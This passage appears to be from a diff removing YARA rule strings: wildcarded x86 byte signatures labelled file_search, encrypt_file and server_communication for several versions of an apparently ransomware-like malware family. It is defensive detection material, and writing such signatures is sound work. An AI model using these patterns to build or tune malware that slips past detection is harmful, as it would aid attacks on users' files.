-            52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C
-            24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E
-            66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3
-            02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85
-            C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54
-            24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85
-            C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ??
-            75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8
-        }
-		$file_search_0_3_5a_2 = {
-            66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05
-            1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B
-            50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ??
-            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_2_6a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
-            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56
-            FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ??
-            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24
-        }
-		$encrypt_file_0_2_6a_2 = {
-            8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C
-            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52
-            E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ??
-            8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D
-            94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05
-            ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_1 = {
-            53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24
-            ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ??
-            ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F
-            56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ??
-            ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
-            6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56
-            FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15
-            ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83
-            C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ??
-            ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4
-            ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_3_1 = {
-            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24
-            ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
-            50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56
-            FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E
-            55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56
-            FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ??
-            ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A
-            ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7
-            44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75
-            1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF
-        }
-		$encrypt_file_0_3_3_2 = {
-            15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE
-            ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ??
-            8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
-            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0
-            5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB
-            ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B
-            C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D
-            4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00
-        }
-		$encrypt_file_0_3_4a_2 = {
-            00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
-            51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A
-            ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ??
-            8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ??
-            ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF
-            15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_0_3_5a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00
-            00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00
-            8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ??
-            ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50
-            89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8
-        }
-		$encrypt_file_0_3_5a_2 = {
-            83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ??
-            ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50
-            55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ??
-            8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ??
-            8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53
-            56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D
-            A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D
-            ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ??
-            33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ??
-            ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24
-            ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$server_communication_0_2_6a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 00 53 33 DB 39 1D ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 53 50 88 5C 24 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 53 89 44 24 ?? 89 44
-            24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ??
-            ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 70 ?? 8A 08 83 C0 ?? 3A CB 75
-            F7 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 2B C6 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83
-            C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14 85 ?? ?? ?? ?? 51 53 52 FF 15
-        }
-		$server_communication_0_2_6a_2 = {
-            A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 51 57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
-            53 53 53 8D 54 24 ?? 52 8B E8 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 53 50 88 9C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 56 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 C7 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? FF D6
-        }
-		$server_communication_0_3_1_1 = {
